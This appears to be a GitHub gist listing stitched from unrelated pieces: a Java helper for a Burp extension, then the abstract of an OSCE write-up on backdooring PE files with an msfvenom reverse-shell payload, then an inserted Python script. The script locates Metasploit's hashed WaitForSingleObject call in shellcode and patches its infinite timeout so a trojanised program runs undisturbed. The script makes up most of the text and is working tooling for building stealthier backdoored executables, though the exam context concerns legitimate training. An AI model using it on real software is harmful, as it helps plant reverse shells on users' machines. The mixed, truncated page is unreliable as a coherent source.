nathunandwani
@pajswigger
pajswigger / UpdateParameter.java
Created September 20, 2018 09:47
Function to help a Burp extension update a parameter
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.List;
import burp.*;

// Only valid for body parameters (PARAM_BODY): the slice starts at the body offset, so a URL or cookie parameter would give a negative length. The value is written raw; URL-encode it first if it contains reserved characters.
static byte[] updateParameter(IExtensionHelpers helpers, IRequestInfo requestInfo, byte[] request, IParameter parameter, String value) {
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    int bodyOffset = requestInfo.getBodyOffset();
    baos.write(request, bodyOffset, parameter.getValueStart() - bodyOffset); // body before the value
    byte[] valueBytes = value.getBytes(StandardCharsets.ISO_8859_1);
    baos.write(valueBytes, 0, valueBytes.length);                             // the new value
    baos.write(request, parameter.getValueEnd(), request.length - parameter.getValueEnd()); // body after the value
    byte[] newBody = baos.toByteArray();
    List<String> headers = requestInfo.getHeaders();
    for (int i = 0; i < headers.size(); i++)
        if (headers.get(i).toLowerCase().startsWith("content-length:"))
            headers.set(i, "Content-Length: " + newBody.length); // keep the header in step with the new body
    return helpers.buildHttpMessage(headers, newBody);
}
@mgeeky
mgeeky / msfvenom-reverse-tcp-WaitForSingleObject.md
Last active November 14, 2023 19:45
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for the WaitForSingleObject call within a modern msfvenom-generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching on issues like stack alignment and locating and patching WaitForSingleObject. It was written when I realised that there are many topics on the Offensive-Security OSCE/CTP forums touching on the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.
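The locate-and-patch step the abstract describes, as an added example that is not part of mgeeky's gist: it derives the 32-bit hash that msfvenom's block_api stub pushes before `call ebp` for kernel32!WaitForSingleObject (Metasploit's ror13 scheme over the module and function names), scans a raw payload for that `push <hash>; call ebp` sequence, and rewrites the dwMilliseconds push from INFINITE to 0 so the backdoored host program no longer blocks until the shell exits. The two timeout encodings it patches (`dec esi; push esi` and `push -1`) are assumptions about how block_shell.asm sets up the argument, the sample bytes are constructed rather than real msfvenom output, and the script does nothing about the stack-alignment issue the document also covers.

```python
"""Find and patch WaitForSingleObject(..., INFINITE) in an msfvenom
windows/shell_reverse_tcp payload (added example, not the gist's code).

Assumes the payload resolves APIs through Metasploit's block_api stub:
    push <ror13 hash of MODULE!Function>
    call ebp
"""
import struct
import sys


def ror32(value, bits):
    """Rotate a 32-bit value right by `bits`."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def block_api_hash(module, function):
    """Metasploit block_api hash: ror13 over the upper-cased UTF-16LE module
    name and ror13 over the ASCII function name (both null-terminated),
    summed modulo 2**32, as block_api.asm computes it in 32-bit registers."""
    h_mod = 0
    for b in (module.upper() + "\x00").encode("utf-16-le"):
        h_mod = (ror32(h_mod, 13) + b) & 0xFFFFFFFF
    h_fun = 0
    for b in (function + "\x00").encode("ascii"):
        h_fun = (ror32(h_fun, 13) + b) & 0xFFFFFFFF
    return (h_mod + h_fun) & 0xFFFFFFFF


WAIT_FOR_SINGLE_OBJECT = block_api_hash("kernel32.dll", "WaitForSingleObject")

# kernel32 APIs worth mapping when orienting inside the payload
KNOWN_APIS = ["CreateProcessA", "WaitForSingleObject", "ExitProcess", "ExitThread"]


def find_api_call(shellcode, api_hash):
    """Offset of `push <hash>; call ebp` (68 xx xx xx xx FF D5), or -1."""
    return shellcode.find(b"\x68" + struct.pack("<I", api_hash) + b"\xff\xd5")


def locate_api_calls(shellcode, names=KNOWN_APIS):
    """Map each known kernel32 API name to the offset of its call stub."""
    found = {}
    for name in names:
        off = find_api_call(shellcode, block_api_hash("kernel32.dll", name))
        if off >= 0:
            found[name] = off
    return found


def patch_infinite_wait(shellcode, window=16):
    """Return (patched, offset, note) with the INFINITE timeout turned into 0.

    dwMilliseconds is pushed shortly before the handle and the hash.  Two
    encodings are handled (assumption about block_shell.asm):
      4E 56   dec esi ; push esi   (esi was 0, so -1 == INFINITE)
      6A FF   push -1
    A zero timeout makes the call return at once instead of hanging the host.
    """
    call_off = find_api_call(shellcode, WAIT_FOR_SINGLE_OBJECT)
    if call_off < 0:
        return shellcode, -1, "WaitForSingleObject call stub not found"
    start = max(0, call_off - window)
    region = shellcode[start:call_off]
    buf = bytearray(shellcode)
    idx = region.rfind(b"\x4e\x56")
    if idx >= 0:
        buf[start + idx] = 0x90          # dec esi -> nop, esi stays 0
        return bytes(buf), start + idx, "patched dec esi -> nop"
    idx = region.rfind(b"\x6a\xff")
    if idx >= 0:
        buf[start + idx + 1] = 0x00      # push -1 -> push 0
        return bytes(buf), start + idx + 1, "patched push -1 -> push 0"
    return shellcode, call_off, "call stub found, timeout push not recognised"


def api_stub(name):
    """push <hash>; call ebp for a kernel32 export (used to build the sample)."""
    return b"\x68" + struct.pack("<I", block_api_hash("kernel32.dll", name)) + b"\xff\xd5"


# Constructed sample, not real msfvenom output: CreateProcessA stub, then
# dec esi; push esi; push dword [eax]; WaitForSingleObject stub; xor eax, eax.
SAMPLE_SHELLCODE = api_stub("CreateProcessA") + b"\x4e\x56\xff\x30" + api_stub("WaitForSingleObject") + b"\x31\xc0"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} payload.bin patched.bin")
    with open(sys.argv[1], "rb") as f:
        data = f.read()
    print("API call stubs:", {k: hex(v) for k, v in locate_api_calls(data).items()})
    patched, off, note = patch_infinite_wait(data)
    print(f"{note} (offset {off:#x})")
    if patched != data:
        with open(sys.argv[2], "wb") as f:
            f.write(patched)
```

Run it against a raw payload (`msfvenom -p windows/shell_reverse_tcp ... -f raw`); the printed stub offsets give the same landmarks the document locates in a debugger, and the hash search works regardless of how the surrounding instructions change between msfvenom versions. If the timeout push is not one of the two encodings above, the script reports the stub offset and leaves the bytes untouched so the patch can be made by hand.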

Contents: